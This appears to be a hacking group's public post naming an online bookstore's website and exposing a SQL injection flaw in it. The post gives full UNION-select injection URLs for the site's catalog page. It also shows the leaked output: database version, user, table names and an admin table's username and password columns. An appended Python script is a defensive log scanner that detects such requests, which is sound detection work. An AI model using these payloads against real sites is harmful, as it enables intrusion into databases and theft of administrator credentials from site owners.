PlanetCreator.Net’s Security Team member Info Freakzz <infofreakzzz(at)gmail.com> has reported another critical SQL injection vulnerability on http://www.irrawaddystore.com, which is owned by Irrawaddy Publishing Group.

The following information was retrieved from the vulnerable site http://www.irrawaddystore.com:

This vulnerability has been reported to: [email protected]

@@version,user(),database()

<a href="http://www.irrawaddystore.com/catalog.php?cat_id=-3%20union%20all%20select%201,2,3,4,5,6,group_concat%28@@version,0x3a,user%28%29,0x3a,database%28%29%29,8,9,10,11,12,13,14,15,16,17,18--" target="_blank">http://www.irrawaddystore.com/catalog.php?cat_id=-3%20union%20all%20select</a>


5.0.90-community:irrawadd_user@localhost:irrawadd_store

9

table_name

<a href="http://www.irrawaddystore.com/catalog.php?cat_id=-3%20union%20all%20select%201,2,3,4,5,6,group_concat%28table_name%29,8,9,10,11,12,13,14,15,16,17,18%20from%20information_schema.tables%20where%20table_schema=database%28%29--" target="_blank">http://www.irrawaddystore.com/catalog.php?cat_id=-3%20union%20all%20select</a>
<strong><a href="http://www.irrawaddystore.com/product.php?pro_id=1" target="_blank">store_admin,store_country,</a></strong>

column_name

<a href="http://www.irrawaddystore.com/catalog.php?cat_id=-3%20union%20all%20select%201,2,3,4,5,6,group_concat%28column_name%29,8,9,10,11,12,13,14,15,16,17,18%20from%20information_schema.columns%20where%20table_schema=database%28%29--" target="_blank">http://www.irrawaddystore.com/catalog.php?cat_id=-3%20union%20all%20select</a>
<strong><a href="http://www.irrawaddystore.com/product.php?pro_id=1" target="_blank">id,username,password</a></strong>

We hope that your security staff will look into this issue and fix it as soon as possible.

Thx – Infofreakzzz for sending security updates!
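
A defender-side check for the request pattern shown above, as an added example that is not part of the original post: it scans web access-log lines for requests whose `cat_id` is not a plain integer and reports which injection markers the decoded value contains. The log lines are constructed samples, and the rule that `cat_id` should always be a non-negative integer is an assumption about the application.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: cat_id is meant to be a non-negative integer category ID.
VALID_ID = re.compile(r"[0-9]{1,10}")

# Markers typical of the UNION-based enumeration described in the post.
MARKERS = {
    "union_select": re.compile(r"union\s+(all\s+)?select", re.I),
    "schema_enum": re.compile(r"information_schema\.(tables|columns)", re.I),
    "fingerprint": re.compile(r"@@version|user\s*\(|database\s*\(", re.I),
    "sql_comment": re.compile(r"--|#|/\*"),
}

# Request field of a Combined Log Format line: "METHOD target PROTOCOL"
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def inspect_line(line, param="cat_id"):
    """Return (value, [marker names]) if param is not a plain integer, else None."""
    m = REQUEST.search(line)
    if not m:
        return None
    query = urlsplit(m.group(1)).query
    # parse_qs percent-decodes values, so %20 and %28 become ' ' and '('.
    for value in parse_qs(query, keep_blank_values=True).get(param, []):
        if not VALID_ID.fullmatch(value):
            hits = [name for name, rx in MARKERS.items() if rx.search(value)]
            return value, hits
    return None

# Constructed sample log lines (documentation IP addresses, made-up timestamps).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2011:10:00:00 +0000] "GET /catalog.php?cat_id=3 HTTP/1.1" 200 5120',
    '192.0.2.77 - - [01/Jan/2011:10:00:05 +0000] "GET /catalog.php?cat_id=-3%20union%20all%20select%201,2,group_concat%28table_name%29%20from%20information_schema.tables-- HTTP/1.1" 200 6011',
    '192.0.2.10 - - [01/Jan/2011:10:00:09 +0000] "GET /product.php?pro_id=1 HTTP/1.1" 200 4410',
    "192.0.2.31 - - [01/Jan/2011:10:00:12 +0000] \"GET /catalog.php?cat_id=3' HTTP/1.1\" 500 312",
]

def scan(lines):
    """Return (line_number, value, markers) for every suspicious request."""
    checked = ((n, inspect_line(line)) for n, line in enumerate(lines, 1))
    return [(n, *hit) for n, hit in checked if hit]

if __name__ == "__main__":
    for n, value, markers in scan(SAMPLE_LOG):
        print(f"line {n}: cat_id={value!r} markers={markers or ['non_integer']}")
```

A non-integer `cat_id` with no markers (the fourth sample line) is still reported, since any value the application would not generate itself is worth reviewing.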
